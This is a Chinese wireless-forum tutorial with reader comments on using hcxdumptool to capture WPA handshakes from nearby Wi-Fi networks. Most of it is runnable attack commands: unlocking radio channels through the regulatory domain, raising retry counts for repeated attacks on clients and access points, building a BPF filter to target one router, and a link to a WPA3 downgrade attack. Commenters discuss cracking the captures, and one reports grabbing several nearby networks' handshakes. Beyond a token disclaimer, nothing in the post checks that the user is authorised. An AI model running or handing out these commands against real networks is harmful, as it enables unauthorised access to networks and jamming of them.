无线论坛 门户 无线安全 查看内容

hcxdumptool 高级攻击工具----简单篇

2024-2-19 11:28| 查看: 478| 评论: 46|原作者: 上上网|来自: Anywlan.com

声明:使用此工具前,你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。 工具hcxdumptool 6.3.2 下载安装最新 依次执行以下命令安装 git c ...
声明:  使用此工具前,你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。

工具hcxdumptool 6.3.2
下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install
有下不了的情况, 这有文件放进去执行上述命令即可
hcxdumptool-master.zip

接下来
首先,设置到畅通无阻域是成功关键因素
sudo iw reg set IN && iw reg get

查看一下你要使用网卡接口
sudo hcxdumptool -l    或   sudo hcxdumptool -L

执行捕获你网卡支持所有频段握手包
sudo hcxdumptool  -F --rds=1

默认自动使用网卡接口编号是wlan0,  如果有插入多块网卡,需对应你自己要使用网卡接口位编号, 例如要使用-i wlan0 或 -i wlan2
执行
sudo hcxdumptool  -i wlan0 -F --rds=1

从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 ,  -i wlan0  网卡接口位编号,   -F 使用网卡支持所有频段,  --rds=1 排序,  文件名称默认使用日期时间命名,  如要指定文件名加参数-w,   -w SSID.pcapng  可用SSID 或MAC DCAEFB命名
如果信号较差,  又必需要捕获到有效握手,  增大重新攻击重试, 工具默认值是: attemptclientmax=10   attemptapmax=4
sudo hcxdumptool  -F --rds=1  --attemptclientmax=100 --attemptapmax=100

如果要攻击单个MAC路由器信号
1 > 先扫描一下2.4Ghz全部信道,    普通模式 --rcascan=p     主动模式 --rcascan=a  如果网卡支持,主动模式会有信标响应,  可按响应计数排序--rds=1
sudo hcxdumptool  --rds=1  --rcascan=p -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a

或扫描你网卡支持2.4Ghz+5Ghz所有频率信道, 使用网卡支持所有信道参数-F    如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool -F  --rcascan=a  --rds=1

2 > 设置网卡为监控模式(如果有插入多块网卡,对应你自己网卡接口位 -i wlan0),  如果创建BPF过滤器失败情况, 需要执行一下这命令
sudo hcxdumptool -m wlan0

3 > 创建BPF过滤器, 需添加你网卡接口对应编号-i wlan0    攻击单个目标MAC:    00:00:00:00:00:01     创建BPF前需要执行一下设置网卡监控命令, 否则创建BPF可能会失败情况
执行创建BPF 攻击单个MAC路由器
sudo tcpdump -i wlan0 wlan addr3 000000000001  -ddd  >g.bpf

4 > 执行捕获单个MAC路由器
sudo hcxdumptool  -F  --bpf=g.bpf

有经验用户, 如要指定对应信道参数-c 如11 和 165信道,  更准确地攻击, 减轻网卡活动周期优化时间。     
注意要对应目标信道: 11a,165b  2.4g信道加a  5g信道加b  6g信道加c  是必须,   因为WiFi6不是唯一信道 !
sudo hcxdumptool  -c 11a,165b  --bpf=g.bpf

捕获文件默认在Home文件夹下 !文件名称是以日期时间命名,    文件格式是pcapng固定格式

补充图解
5.png


更详细信息hcxdumptool -help      或跳转 >>>
攻击WPA3降级从而捕获为WP2握手包
https://www.anywlan.com/forum.ph ... 321&fromuid=1093833






高人

专业

握手

霸气

雷人

吐血

山寨

奋斗
发表评论

最新评论

引用 執筆、寫下情 2024-1-31 14:15
沙发啊沙发啊,同时问一下大神,这个可以用mt7921au网卡吗?
引用 上上网 2024-1-31 14:23
執筆、寫下情 发表于 2024-1-31 14:15
沙发啊沙发啊,同时问一下大神,这个可以用mt7921au网卡吗?

wifi6 mt7921au我没有,  不知道哦
引用 马上发财 2024-1-31 20:04
執筆、寫下情 发表于 2024-1-31 14:15
沙发啊沙发啊,同时问一下大神,这个可以用mt7921au网卡吗?

大佬,你买了7921的网卡么?是哪款啊
引用 wc125123 2024-2-1 07:37
大佬,抓的为pcapng类似的握手包使用什么跑包软件能打开啊,看了下wifipr和ewsa识别不了pcapng类型的啊?
引用 執筆、寫下情 2024-2-1 12:22
马上发财 发表于 2024-1-31 20:04
大佬,你买了7921的网卡么?是哪款啊

买了,淘宝上买的,花了100大洋,是一个WiFi6的,等收到,我试试效果哈
引用 執筆、寫下情 2024-2-1 12:23
wc125123 发表于 2024-2-1 07:37
大佬,抓的为pcapng类似的握手包使用什么跑包软件能打开啊,看了下wifipr和ewsa识别不了pcapng类型的啊? ...

直接把后缀改为cap行不行呢?
引用 hhhhu 2024-2-1 14:11
hc2200
引用 執筆、寫下情 2024-2-1 15:19

来了一个新人,大家快来围殴他
引用 wc125123 2024-2-1 16:11
執筆、寫下情 发表于 2024-2-1 12:23
直接把后缀改为cap行不行呢?

好的谢谢,等等试一下看看能行不
引用 马上发财 2024-2-1 20:45
執筆、寫下情 发表于 2024-2-1 12:22
买了,淘宝上买的,花了100大洋,是一个WiFi6的,等收到,我试试效果哈

能发下链接或具体是啥型号的网卡呢?效果如何啊
引用 執筆、寫下情 2024-2-2 17:13
wc125123 发表于 2024-2-1 16:11
好的谢谢,等等试一下看看能行不

试了吗?行不行呢
引用 執筆、寫下情 2024-2-2 17:14
马上发财 发表于 2024-2-1 20:45
能发下链接或具体是啥型号的网卡呢?效果如何啊

等我收到了,试试再说哈。链接应该不能发吧,到时候哦说一下怎么找就行了
引用 wc125123 2024-2-2 17:40

没有成功,更改后缀名之后,导入时提示无效,也不知道是没有抓住有效的包还是不支持更改,再学习学习看看。
引用 马上发财 2024-2-3 10:39
wc125123 发表于 2024-2-1 07:37
大佬,抓的为pcapng类似的握手包使用什么跑包软件能打开啊,看了下wifipr和ewsa识别不了pcapng类型的啊? ...

俺也在找这个,上次看楼主的教程抓了一些也不知道是否有效,就是这种格式的不知道咋跑,楼主也不给这方面的教程。
引用 lwgchc 2024-2-3 15:09
这个太实用了
引用 wc125123 2024-2-5 10:42
使用Wireshark把抓的包转换成pcap格式后,转换的包里面没有内容了,而且大小变成1kb了,不知道怎么回事。C:\Users\admin\Desktop
引用 執筆、寫下情 2024-2-18 13:54
執筆、寫下情 发表于 2024-2-2 17:14
等我收到了,试试再说哈。链接应该不能发吧,到时候哦说一下怎么找就行了 ...

反馈:效果非常好
引用 上上网 2024-2-18 14:22

你用虚拟机还是用物理硬盘启动 ?
网卡是USB口还是NGFF/M.2口或PCIE口
使用物理硬盘启动,  插入会不会像下面这个链接一样认作为大容量U盘驱动器 ?  如果不是我也想买
https://www.anywlan.com/forum.ph ... amp;fromuid=1093833

可否执行下命令查看一下网卡支持那些信道
sudo hcxdumptool -m wlan0
引用 執筆、寫下情 2024-2-18 17:27
上上网 发表于 2024-2-18 14:22
你用虚拟机还是用物理硬盘启动 ?
网卡是USB口还是NGFF/M.2口或PCIE口
使用物理硬盘启动,  插入会不会像下 ...

大佬你好,我是用的虚拟机kali系统,用的这个工具:wireless-handshaker。一会的功夫就抓了附近好几个包,我是定向抓的。这个是USB接口的。等下我下班,运行这个命令截图发一下

查看全部评论(46)

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-5-22 07:18

返回顶部